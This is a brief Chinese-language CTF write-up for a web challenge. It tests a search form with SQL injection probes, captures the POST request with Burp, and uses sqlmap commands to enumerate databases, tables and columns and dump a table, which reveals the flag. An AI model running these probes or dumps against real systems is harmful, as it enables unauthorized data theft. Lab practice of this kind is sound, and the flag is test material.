- 为什么要写已经结束很久的题的writeup:因为在做某CTF训练平台的题
首先打开网站,是一个搜索界面,随便搜索下,好像没什么反应:
试试有没有注入:
- a':空白界面
- a and 1=1:没返回内容
- a and 1=1 and '%'='%:没返回内容
好像没啥可注入的,那看下包吧,上burp,发现是post发包:
那么存为1.txt,用sqlmap跑:python sqlmap.py -r 1.txt -p search --dbs
python sqlmap.py -r 1.txt -p search -D news --tables
python sqlmap.py -r 1.txt -p search -D news -T secret_table --columns
python sqlmap.py -r 1.txt -p search -D news -T secret_table -C "fl4g,id" --dump
得到flag:QCTF{sq1_inJec7ion_ezzz}
